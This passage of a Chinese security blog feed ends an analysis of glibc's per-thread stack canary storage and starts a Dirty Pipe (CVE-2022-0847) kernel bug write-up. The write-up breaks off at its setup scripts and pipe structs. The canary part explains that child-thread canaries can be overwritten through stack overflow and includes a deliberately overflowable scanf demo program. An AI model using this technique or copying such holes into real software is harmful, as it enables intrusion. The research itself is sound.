class="line"><span class="meta">    : <span class="string">&quot;i&quot;</span> (offsetof (struct pthread, header.self)));        \</span></span><br><span class="line"><span class="meta">     __self;&#125;)</span></span><br></pre></td></tr></table></figure><p>而 <code>pthread</code> 结构体的声明如下，根据注释可以得知 <code>pthread</code> 结构体就是<strong>线程控制块结构</strong>：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/* Thread descriptor data structure.  */</span></span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">pthread</span></span><br><span class="line">&#123;</span><br><span class="line">  <span class="keyword">union</span></span><br><span class="line">  &#123;</span><br><span class="line"><span class="meta">#<span class="keyword">if</span> !TLS_DTV_AT_TP</span></span><br><span class="line">    <span class="comment">/* This overlaps the TCB as used for TLS without threads (see tls.h).  */</span></span><br><span class="line">    <span class="type">tcbhead_t</span> header;</span><br><span class="line"><span class="meta">#<span class="keyword">else</span></span></span><br><span class="line">    <span class="keyword">struct</span></span><br><span class="line">    &#123;</span><br><span class="line">      ...</span><br><span class="line">    &#125; header;</span><br><span class="line"><span class="meta">#<span class="keyword">endif</span></span></span><br><span class="line"></span><br><span class="line">    <span class="comment">/* This extra padding has no special purpose, and this structure layout</span></span><br><span class="line"><span class="comment">       is private and subject to change without affecting the official ABI.</span></span><br><span class="line"><span class="comment">       We just have it here in case it might be convenient for some</span></span><br><span class="line"><span class="comment">       implementation-specific instrumentation hack or suchlike.  */</span></span><br><span class="line">    <span class="type">void</span> *__padding[<span class="number">24</span>];</span><br><span class="line">  &#125;;</span><br><span class="line"></span><br><span class="line">  ...</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>由于在 <code>x86_64</code> 架构下，<code>TLS_DTV_AT_TP</code>宏定义为 0：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// sysdeps\x86_64\nptl\tls.h</span></span><br><span class="line"></span><br><span class="line"><span class="comment">/* The TCB can have any size and the memory following the address the</span></span><br><span class="line"><span class="comment">   thread pointer points to is unspecified.  Allocate the TCB there.  */</span></span><br><span class="line"><span class="meta"># <span class="keyword">define</span> TLS_TCB_AT_TP  1</span></span><br><span class="line"><span class="meta"># <span class="keyword">define</span> TLS_DTV_AT_TP  0</span></span><br></pre></td></tr></table></figure><p>因此 <code>pthread</code> 结构的首个字段为 <code>tcbhead_t header</code>：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// sysdeps\x86_64\nptl\tls.h</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">typedef</span> <span class="keyword">struct</span></span><br><span class="line">&#123;</span><br><span class="line">  <span class="type">void</span> *tcb;    <span class="comment">/* Pointer to the TCB.  Not necessarily the</span></span><br><span class="line"><span class="comment">         thread descriptor used by libpthread.  */</span></span><br><span class="line">  <span class="type">dtv_t</span> *dtv;</span><br><span class="line">  <span class="type">void</span> *self;   <span class="comment">/* Pointer to the thread descriptor.  */</span></span><br><span class="line">  <span class="type">int</span> multiple_threads;</span><br><span class="line">  <span class="type">int</span> gscope_flag;</span><br><span class="line">  <span class="type">uintptr_t</span> sysinfo;</span><br><span class="line">  <span class="type">uintptr_t</span> stack_guard;</span><br><span class="line">  <span class="type">uintptr_t</span> pointer_guard;</span><br><span class="line">  </span><br><span class="line">  ... </span><br><span class="line">&#125; <span class="type">tcbhead_t</span>;</span><br></pre></td></tr></table></figure><p>在结构体 <code>tcbhead_t</code> 中，我们可以看到熟悉的 <code>stack_guard</code> 字段，单个线程的 canary 值就存放在这里。而 <code>tcb</code> 指针和 <code>self</code> 指针，实际指向的都是同一个地址，即 <code>struct pthread</code> 结构体（亦或者是 <code>struct tcbhead_t</code> 本身，这两个结构体地址相同）。</p><p>回顾 <code>THREAD_SELF</code> 宏定义，我们不难推断出 <code>%fs</code> 寄存器存放的是 <code>struct pthread</code> 结构体的地址，而 <code>%fs:28h</code> 引用的就是 <code>pthread::tcbhead_t::stack_guard</code> 的地方，与之前 IDA 中显示的一致。</p><blockquote><p>不过不知道为什么要获取 <code>struct pthread</code> 地址得绕这么大弯，得获取其 head 的 self 指针…</p></blockquote><p>这里需要说一下 <code>%fs</code> 寄存器为什么存放的是<code>struct pthread</code> 结构体的地址。看看这个宏定义：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/* Code to initially initialize the thread pointer.  This might need</span></span><br><span class="line"><span class="comment">   special attention since &#x27;errno&#x27; is not yet available and if the</span></span><br><span class="line"><span class="comment">   operation can cause a failure &#x27;errno&#x27; must not be touched.</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment">   We have to make the syscall for both uses of the macro since the</span></span><br><span class="line"><span class="comment">   address might be (and probably is) different.  */</span></span><br><span class="line"><span class="meta"># <span class="keyword">define</span> TLS_INIT_TP(thrdescr) \</span></span><br><span class="line"><span class="meta">  (&#123; void *_thrdescr = (thrdescr);                \</span></span><br><span class="line"><span class="meta">     tcbhead_t *_head = _thrdescr;               \</span></span><br><span class="line"><span class="meta">     int _result;                 \</span></span><br><span class="line"><span class="meta">                        \</span></span><br><span class="line"><span class="meta">     _head-&gt;tcb = _thrdescr;                   \</span></span><br><span class="line"><span class="meta">     <span class="comment">/* For now the thread descriptor is at the same address.  */</span>       \</span></span><br><span class="line"><span class="meta">     _head-&gt;self = _thrdescr;                  \</span></span><br><span class="line"><span class="meta">                        \</span></span><br><span class="line"><span class="meta">     <span class="comment">/* It is a simple syscall to set the %fs value for the thread.  */</span>       \</span></span><br><span class="line"><span class="meta">     asm volatile (<span class="string">&quot;syscall&quot;</span>                  \</span></span><br><span class="line"><span class="meta">       : <span class="string">&quot;=a&quot;</span> (_result)               \</span></span><br><span class="line"><span class="meta">       : <span class="string">&quot;0&quot;</span> ((unsigned long int) __NR_arch_prctl),           \</span></span><br><span class="line"><span class="meta">         <span class="string">&quot;D&quot;</span> ((unsigned long int) ARCH_SET_FS),         \</span></span><br><span class="line"><span class="meta">         <span class="string">&quot;S&quot;</span> (_thrdescr)                \</span></span><br><span class="line"><span class="meta">       : <span class="string">&quot;memory&quot;</span>, <span class="string">&quot;cc&quot;</span>, <span class="string">&quot;r11&quot;</span>, <span class="string">&quot;cx&quot;</span>);             \</span></span><br><span class="line"><span class="meta">                        \</span></span><br><span class="line"><span class="meta">    _result ? <span class="string">&quot;cannot set %fs base address for thread-local storage&quot;</span> : 0;     \</span></span><br><span class="line"><span class="meta">  &#125;)</span></span><br><span class="line"></span><br><span class="line"><span class="meta"># <span class="keyword">define</span> TLS_DEFINE_INIT_TP(tp, pd) void *tp = (pd)</span></span><br></pre></td></tr></table></figure><p>宏定义 <code>TLS_INIT_TP</code> 会调用 SYS_ARCH_SET_FS 系统调用，将 <code>%fs</code> 寄存器的值设置为传入的 <code>pthread</code> 结构体地址。这里也可以看到该宏定义会同步将线程控制块的地址设置进 <code>tcb</code> 指针和 <code>self</code> 指针字段中。</p><p>那么何时会调用 <code>TLS_INIT_TP</code> 宏来设置主线程的 TCB 至 <code>%fs</code> 中呢？有两种情况：</p><ol><li>在执行 <code>dl_main</code> 函数时，满足某种条件需要提前使用 TLS，于是提早初始化。</li><li>在执行 <code>__libc_start_main</code> 函数时，执行其中的 <code>__pthread_initialize_minimal -&gt; __libc_setup_tls</code> 函数调用链。</li></ol><p>无论哪种可能，这两种情况都会在创建 canary 前完成。尤其是第二种，几乎贴着创建 canary 步骤。那么这一整个逻辑就都串起来了：</p><ol><li>动态链接器在执行 <code>dl_main</code> 函数前，先初始化 <code>_dl_random</code> 随机数。</li><li>控制流在创建 Canary 前，执行<code>TLS_INIT_TP</code> 宏，将 <code>%fs</code> 寄存器设置为主线程的线程控制块地址。</li><li>控制流在执行 <code>__libc_start_main</code>之中使用 <code>_dl_random</code> 随机数，生成 canary 值，并将其存放在 <code>%fs</code> 寄存器所指定的<strong>线程控制块中用于存放 canary 的字段</strong>。</li></ol><h3 id="3-Canary-读取">3. Canary 读取</h3><p>Canary 写入主线程 TLS 的流程有了，那么要如何读取呢？在 <code>sysdeps\x86_64\stackguard-macros.h</code> 中有着这样的一段宏定义:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">define</span> STACK_CHK_GUARD \</span></span><br><span class="line"><span class="meta">  (&#123; uintptr_t x;           \   </span></span><br><span class="line">     <span class="built_in">asm</span> (<span class="string">&quot;mov %%fs:%c1, %0&quot;</span> : <span class="string">&quot;=r&quot;</span> (x)     \</span><br><span class="line">    : <span class="string">&quot;i&quot;</span> (<span class="built_in">offsetof</span> (<span class="type">tcbhead_t</span>, stack_guard))); x; &#125;)</span><br></pre></td></tr></table></figure><p>因此只要使用 <code>STACK_CHK_GUARD</code> 宏就能读取出当前线程的 canary 值，例如：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> (stack_chk_guard_copy != STACK_CHK_GUARD)</span><br><span class="line">&#123;</span><br><span class="line">    <span class="built_in">puts</span> (<span class="string">&quot;STACK_CHK_GUARD changed between constructor and do_test&quot;</span>);</span><br><span class="line">    <span class="keyword">return</span> <span class="number">1</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>如果关闭了 <code>THREAD_SET_STACK_GUARD</code>  宏，即关闭线程栈保护，那么计算出来的 canary 值会被保留进全局变量 <code>__stack_chk_guard</code> 中：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// __libc_start_main 函数片段</span></span><br><span class="line"></span><br><span class="line">  <span class="comment">/* Set up the stack checker&#x27;s canary.  */</span></span><br><span class="line">  <span class="type">uintptr_t</span> stack_chk_guard = _dl_setup_stack_chk_guard (_dl_random);</span><br><span class="line"><span class="meta"># <span class="keyword">ifdef</span> THREAD_SET_STACK_GUARD</span></span><br><span class="line">  <span class="built_in">THREAD_SET_STACK_GUARD</span> (stack_chk_guard);</span><br><span class="line"><span class="meta"># <span class="keyword">else</span></span></span><br><span class="line">  <span class="comment">// 这里!</span></span><br><span class="line">  __stack_chk_guard = stack_chk_guard;</span><br><span class="line"><span class="meta"># <span class="keyword">endif</span></span></span><br></pre></td></tr></table></figure><p>仍然可以通过 <code>STACK_CHK_GUARD</code> 宏来获取：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// sysdeps\generic\stackguard-macros.h</span></span><br><span class="line">    </span><br><span class="line"><span class="keyword">extern</span> <span class="type">uintptr_t</span> __stack_chk_guard;</span><br><span class="line"><span class="meta">#<span class="keyword">define</span> STACK_CHK_GUARD __stack_chk_guard</span></span><br></pre></td></tr></table></figure><p><code>STACK_CHK_GUARD</code> 宏在 glibc 中几乎找不到使用点，推测这个宏是为 gcc 编译时加入<strong>读取 canary 值的操作</strong>所做的准备。</p><h3 id="4-TCB-位置">4. TCB 位置</h3><h4 id="a-主线程">a. 主线程</h4><p>主线程的 TCB 的内存分配过程过于复杂：</p><ul><li>一种是在 <code>__libc_start_main -&gt; __pthread_initialize_minimal -&gt; __libc_setup_tls</code> 函数调用链中，调用 <code>__sbrk</code> 函数在堆内存上分配 TLS。</li><li>再一种是在 <code>rtld</code> 的 <code>_dl_allocate_tls_storage</code> 函数中调用 <code>mmap</code> 函数来分配 TLS。</li></ul><p>不过看上去大部分程序的 TCB 内存分配都会在 rtld 中提前进行，而不会等到走进 <code>user entry</code> 后才开始。随手写了个程序调试了一下，发现主线程 TLS 果然是通过 mmap 函数创建的：</p><p><img src="/2022/08/thread_canary/image-20220825083934721.png" alt="image-20220825083934721"></p><p>gdb 无法直接读取 <code>%fs</code> 寄存器的值，会读取到一个 0：</p><p><img src="/2022/08/thread_canary/image-20220825084033723.png" alt="image-20220825084033723"></p><p>因此需要用 gdb 调用 <code>pthread_self</code> 函数来获取当前线程的 TCB 位置，这个函数较为简单：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">pthread_t</span></span><br><span class="line">__pthread_self (<span class="type">void</span>)</span><br><span class="line">&#123;</span><br><span class="line">  <span class="keyword">return</span> (<span class="type">pthread_t</span>) THREAD_SELF;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>这里可以看到用户程序从 <code>%fs:28h</code> 处取出的 Canary 与主线程 TCB 中存放的 Canary 一致，验证之前的分析：</p><p><img src="/2022/08/thread_canary/image-20220825084443810.png" alt="image-20220825084443810"></p><p>结论：主线程 TLS 位置<strong>较为随机</strong>，想通过修改主线程 TLS 来改主线程 canary 几乎是不可能的。</p><h4 id="b-子线程">b. 子线程</h4><p>要看子线程的 TCB 与 Canary 逻辑，那就得移步进 <code>pthread_create</code> 函数的实现。这个函数位于 <code>nptl\pthread_create.c</code> 中，有 <code>__pthread_create_2_0</code> 和 <code>__pthread_create_2_1</code> 两个实现版本，不过 2.0 是 2.1 的 wrapper，因此我们将目光放在 2.1 版本的实现上。</p><p>这里只看有趣的代码片段：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">  <span class="keyword">struct</span> <span class="title class_">pthread</span> *pd = <span class="literal">NULL</span>;</span><br><span class="line">  <span class="type">int</span> err = <span class="built_in">ALLOCATE_STACK</span> (iattr, &amp;pd);</span><br><span class="line"></span><br><span class="line">  [...]</span><br><span class="line"></span><br><span class="line">  <span class="comment">/* Initialize the TCB.  All initializations with zero should be</span></span><br><span class="line"><span class="comment">   performed in &#x27;get_cached_stack&#x27;.  This way we avoid doing this if</span></span><br><span class="line"><span class="comment">   the stack freshly allocated with &#x27;mmap&#x27;.  */</span></span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="keyword">if</span> TLS_TCB_AT_TP</span></span><br><span class="line">  <span class="comment">/* Reference to the TCB itself.  */</span></span><br><span class="line">  pd-&gt;header.self = pd;</span><br><span class="line"></span><br><span class="line">  <span class="comment">/* Self-reference for TLS.  */</span></span><br><span class="line">  pd-&gt;header.tcb = pd;</span><br><span class="line"><span class="meta">#<span class="keyword">endif</span></span></span><br><span class="line"></span><br><span class="line">  [...]</span><br><span class="line">      </span><br><span class="line">  <span class="comment">/* Copy the stack guard canary.  */</span></span><br><span class="line"><span class="meta">#<span class="keyword">ifdef</span> THREAD_COPY_STACK_GUARD</span></span><br><span class="line">  <span class="built_in">THREAD_COPY_STACK_GUARD</span> (pd);</span><br><span class="line"><span class="meta">#<span class="keyword">endif</span></span></span><br></pre></td></tr></table></figure><p>首先，<code>pthread_create</code> 会创建线程栈（每个线程都有一个独立的栈），这个栈可以是用先前的缓存（例如重用被终止线程的栈），也可以是 mmap 出的一个新的栈。有趣的是，<strong>新线程的 TCB 会在这个线程栈上创建</strong>，那这就使得子线程的 TCB 地址对用户来说<strong>不再是随机</strong>的，因此<strong>可以通过子线程的栈溢出来覆写子线程 TCB 的 Canary</strong>。</p><p>需要注意的是，在 <code>allocate_stack</code> 这个为子线程分配栈的函数中，TCB（<code>pthread</code> 结构体）将会被放置在整个线程栈的<strong>栈底</strong>，即线程栈的最最最最底部（也就是最最高地址处）存放的是 TCB。</p><p>这个可以验证一下，从网上 CV 了一个 pthread 样例稍微改了下，编译调试：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span><span class="string">&lt;pthread.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span><span class="string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="comment">// a simple pthread example </span></span><br><span class="line"><span class="comment">// compile with -lpthreads</span></span><br><span class="line"></span><br><span class="line"><span class="comment">// create the function to be executed as a thread</span></span><br><span class="line"><span class="function"><span class="type">void</span> *<span class="title">thread</span><span class="params">(<span class="type">void</span> *ptr)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="comment">// tell complier to enable stack canary detection.</span></span><br><span class="line">    <span class="type">char</span> ch[<span class="number">0x20</span>];</span><br><span class="line">    <span class="built_in">scanf</span>(<span class="string">&quot;%s&quot;</span>, ch);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;%s&quot;</span>, ch);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">main</span><span class="params">(<span class="type">int</span> argc, <span class="type">char</span> **argv)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="comment">// create the thread objs</span></span><br><span class="line">    <span class="type">pthread_t</span> thread1;</span><br><span class="line">    <span class="comment">// start the threads</span></span><br><span class="line">    <span class="built_in">pthread_create</span>(&amp;thread1, <span class="literal">NULL</span>, *thread, <span class="literal">NULL</span>);</span><br><span class="line">    <span class="comment">// wait for threads to finish</span></span><br><span class="line">    <span class="built_in">pthread_join</span>(thread1, <span class="literal">NULL</span>);</span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>下个断点在 <code>thread</code> 函数上，然后开跑切换至子线程。此时的线程栈和 TCB 地址如下，可以看到非常的贴近，而且都在同一个内存段上：</p><p><img src="/2022/08/thread_canary/image-20220825091309716.png" alt="image-20220825091309716"></p><p>之后在线程栈底部找到了这个 Canary，偏移量是 <code>0x878</code>（属实是有点远）：</p><p><img src="/2022/08/thread_canary/image-20220825091534174.png" alt="image-20220825091534174"></p><p>除了线程栈分配较为有趣以外，下边还有一个 <code>THREAD_COPY_STACK_GUARD</code>宏调用，这个调用会把当前线程的 canary 复制一份进新线程的 TCB 中。注意控制流的基本单位是线程，虽然每个线程的 canary 值都相同，但在验证 canary 时，只会去获取当前 TCB 上存储的 canary 值。也就是说如果以非法手段将子线程的 canary 值改变，那么这种改变不影响其他线程的执行。</p><p>整个关于用户层 Canary 机制差不多就是分析的这些内容，这个机制还是比较有趣的。</p><h2 id="四、参考">四、参考</h2><ul><li><p><a href="https://zhuanlan.zhihu.com/p/435667117">Linux内核态是如何使用GS寄存器引用进程的stack canary的？ - 知乎</a></p></li><li><p><a href="https://my.oschina.net/macwe/blog/610357">解读 Linux 安全机制之栈溢出保护 - oschina</a></p></li></ul>]]></content>
    
    
    <summary type="html">&lt;h2 id=&quot;一、简介&quot;&gt;一、简介&lt;/h2&gt;
&lt;p&gt;一直都比较好奇 Canary 在 Linux 中的实现，但没什么心思去具体了解它的实现。这种好奇心在得知&lt;strong&gt;可以通过修改子线程的线程局部存储来达到篡改 canary 目的&lt;/strong&gt;时达到了高峰，于是想好好去研究一下。&lt;/p&gt;
&lt;p&gt;太久没写博客了，这里就简单记录一下。&lt;/p&gt;</summary>
    
    
    
    
    <category term="linux" scheme="https://kiprey.github.io/tags/linux/"/>
    
  </entry>
  
  <entry>
    <title>Linux Dirty Pipe CVE-2022-0847 漏洞分析</title>
    <link href="https://kiprey.github.io/2022/04/dirty-pipe/"/>
    <id>https://kiprey.github.io/2022/04/dirty-pipe/</id>
    <published>2022-04-02T16:00:00.000Z</published>
    <updated>2025-11-24T03:59:39.995Z</updated>
    
    <content type="html"><![CDATA[<h2 id="一、简介">一、简介</h2><p>Dirty Pipe 漏洞是 Linux 系统中的一个内核提权漏洞，漏洞危害堪比 Dirty COW，但相对于 Dirty COW 来说更加容易利用。</p><p>漏洞影响范围：<a href="f6dd975583bd8ce088400648fd9819e4691c8958">pipe: merge anon_pipe_buf*_ops - linux commit</a> （v5.8-rc1） ~ <a href="https://github.com/torvalds/linux/commit/9d2231c5d74e13b2a0546fee6737ee4446017903">lib/iov_iter: initialize “flags” in new pipe_buffer</a>（v5.17-rc6）</p><p>时间范围大概是 2020/5/21 - 2022/2/21。</p><span id="more"></span><h2 id="二、环境搭建">二、环境搭建</h2><p>参照先前的 <a href="https://kiprey.github.io/2021/10/kernel_pwn_introduction/">Linux pwn 环境搭建笔记</a> 来搭建出一个带有漏洞的 linux 环境。这里使用的 commit id 为 f6dd975583bd8ce088400648fd9819e4691c8958。</p><p>简单贴几个脚本：</p><blockquote><p>几个关键文件夹的位置关系：</p><ul><li><code>linux/busybox-1.34.1/_install</code>：busybox 文件系统位置</li><li><code>linux/myfolder</code>：存放 exp 等需要复制进 VM 的文件</li></ul></blockquote><p>启动 linux 脚本：</p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta prompt_">#</span><span class="language-bash">! /bin/bash</span></span><br><span class="line"><span class="meta prompt_"></span></span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">判断当前权限是否为 root，需要高权限以执行 gef-remote --qemu-mode</span></span><br><span class="line">user=$(env | grep &quot;^USER&quot; | cut -d &quot;=&quot; -f 2)</span><br><span class="line">if [ &quot;$user&quot; != &quot;root&quot;  ]</span><br><span class="line">  then</span><br><span class="line">    echo &quot;请使用 root 权限执行&quot;</span><br><span class="line">    exit</span><br><span class="line">fi</span><br><span class="line"><span class="meta prompt_"></span></span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">编译 POC</span></span><br><span class="line">g++ ./myfolder/poc.c -o ./myfolder/poc -static</span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">复制文件至 rootfs</span></span><br><span class="line">cp ./myfolder/* busybox-1.34.1/_install</span><br><span class="line"><span class="meta prompt_"></span></span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">构建 rootfs</span></span><br><span class="line">pushd busybox-1.34.1/_install</span><br><span class="line">find . | cpio -o --format=newc &gt; ../../rootfs.img</span><br><span class="line">popd</span><br><span class="line"></span><br><span class="line">gnome-terminal -e &#x27;gdb -x mygdbinit&#x27;</span><br><span class="line"><span class="meta prompt_"></span></span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">启动 qemu</span></span><br><span class="line">qemu-system-x86_64 \</span><br><span class="line">    -kernel ./arch/x86/boot/bzImage \</span><br><span class="line">    -initrd ./rootfs.img \</span><br><span class="line">    -append &quot;nokaslr&quot; \</span><br><span class="line">    -m 2G \</span><br><span class="line">    -s  \</span><br><span class="line">    -S \</span><br><span class="line">    -nographic -append &quot;console=ttyS0&quot;</span><br></pre></td></tr></table></figure><p>gdbinit：</p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">set architecture i386:x86-64</span><br><span class="line">add-symbol-file vmlinux</span><br><span class="line">gef-remote --qemu-mode localhost:1234</span><br><span class="line"><span class="meta prompt_"></span></span><br><span class="line"><span class="meta prompt_"># </span><span class="language-bash">b start_kernel</span></span><br><span class="line">c</span><br></pre></td></tr></table></figure><p>启动 qemu 时报了一个错：</p><p><img src="/2022/04/dirty-pipe/image-20220401145316024.png" alt="image-20220401145316024"></p><p>这是因为先前启动 qemu 时忘记指定内存 <code>-m</code> 了，加个 <code>-m 2G</code> 分配 2G 的内存给 qemu 即可。</p><h2 id="三、代码浅析">三、代码浅析</h2><p>在分析漏洞之前，我们需要熟悉一下该漏洞所涉及的代码片段，也算是顺便熟悉一下 pipe 机制的实现。</p><p>这里将涉及 commit f6dd97 中的几个文件：</p><ul><li><code>include/linux/pipe_fs_i.h</code></li><li><code>fs/pipe.c</code></li><li><code>fs/splice.c</code></li><li><code>lib/iov_iter.c</code></li><li>…</li></ul><h3 id="1-pipe-相关结构体">1. pipe 相关结构体</h3><h4 id="a-pipe-inode-info">a. pipe_inode_info</h4><p><code>pipe_inode_info</code> 结构体存放了 pipe 机制所要用到的字段：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> *  struct pipe_inode_info - a linux kernel pipe</span></span><br><span class="line"><span class="comment"> *  @mutex: mutex protecting the whole thing</span></span><br><span class="line"><span class="comment"> *  @rd_wait: reader wait point in case of empty pipe</span></span><br><span class="line"><span class="comment"> *  @wr_wait: writer wait point in case of full pipe</span></span><br><span class="line"><span class="comment"> *  @head: The point of buffer production</span></span><br><span class="line"><span class="comment"> *  @tail: The point of buffer consumption</span></span><br><span class="line"><span class="comment"> *  @max_usage: The maximum number of slots that may be used in the ring</span></span><br><span class="line"><span class="comment"> *  @ring_size: total number of buffers (should be a power of 2)</span></span><br><span class="line"><span class="comment"> *  @tmp_page: cached released page</span></span><br><span class="line"><span class="comment"> *  @readers: number of current readers of this pipe</span></span><br><span class="line"><span class="comment"> *  @writers: number of current writers of this pipe</span></span><br><span class="line"><span class="comment"> *  @files: number of struct file referring this pipe (protected by -&gt;i_lock)</span></span><br><span class="line"><span class="comment"> *  @r_counter: reader counter</span></span><br><span class="line"><span class="comment"> *  @w_counter: writer counter</span></span><br><span class="line"><span class="comment"> *  @fasync_readers: reader side fasync</span></span><br><span class="line"><span 